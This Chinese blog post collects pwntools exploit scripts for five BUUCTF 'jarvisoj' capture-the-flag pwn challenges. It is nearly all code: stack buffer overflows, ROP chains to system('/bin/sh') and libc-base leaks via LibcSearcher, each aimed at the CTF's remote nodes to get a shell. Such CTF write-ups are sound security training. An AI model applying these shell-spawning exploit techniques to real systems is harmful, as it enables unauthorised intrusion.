1. 技术文章
  2. BUUCTF jarvisoj exp整合

BUUCTF jarvisoj exp整合

二次信任 提交于 2020-02-24 12:52:18

0x01 jarvisoj_level0

 简单的地址改写

from pwn import *

p = remote('node3.buuoj.cn', 26882)
#p = process('./level0')

shell_addr = 0x0000000000400596

p.sendline('a'*0x88+p64(shell_addr))

p.interactive()

0x02 jarvisoj_level2

 简单rop,在可执行文件中找到rop

from pwn import *

p = remote('node3.buuoj.cn', 26369)

bin_sh = 0x0804A024
system_addr = 0x08048320

p.sendline('a'*0x8C + p32(system_addr) + p32(0) + p32(bin_sh))

p.interactive()

0x03 jarvisoj_level2_x64

 64位的

from pwn import *

context.log_level = 'debug'

p = remote('node3.buuoj.cn', 27014)
#p = process('./level2_x64')
elf = ELF('./level2_x64')

pop_rdi = 0x00000000004006B3
system_plt = elf.plt['system']
str_sh = 0x0000000000600A90

p.recvuntil('Input:\n')
p.sendline('a'*0x88 + p64(pop_rdi) + p64(str_sh) + p64(system_plt))

p.interactive()

0x04 jarvisoj_level3

 泄露libc基址,构造rop

from pwn import *
from LibcSearcher import *

#p = process('./level3')
p = remote('node3.buuoj.cn', 26763)
elf = ELF('level3')

read_got = elf.got['read']
write_plt = elf.plt['write']
vul_addr = 0x0804844B


payload = 'a'*0x8C +p32(write_plt) + p32(vul_addr) + p32(1) + p32(read_got) + p32(4)
p.sendlineafter('Input:\n', payload)

read_addr = u32(p.recv(4))
libc = LibcSearcher('read', read_addr)

libc_base = read_addr - libc.dump('read')

system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
payload = 'a'*0x8C + p32(system_addr) + p32(0) +p32(str_bin_sh)

p.sendlineafter('Input:\n', payload) 

p.interactive()

0x05 jarvisoj_level3_x64

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'

p = remote('node3.buuoj.cn', 26368)
elf = ELF('./level3_x64')

vul_addr = 0x00000000004005E6
pop_rdi_ret = 0x00000000004006b3
pop_rsi_r15_ret = 0x00000000004006b1
write_got = elf.got['write']
write_plt = elf.plt['write']

payload = 'a'*0x88 + p64(pop_rsi_r15_ret) + p64(write_got) + p64(0) + p64(pop_rdi_ret) + p64(1) + p64(write_plt) + p64(vul_addr)
p.sendlineafter('Input:\n', payload)

write_addr = u64(p.recv(6).ljust(8, '\x00'))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')

system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')


payload = 'a'*0x88 + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(vul_addr)
p.sendlineafter('Input:\n', payload)

p.interactive()

随手关注一个,就是对我的支持

在这里插入图片描述

标签
payload
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!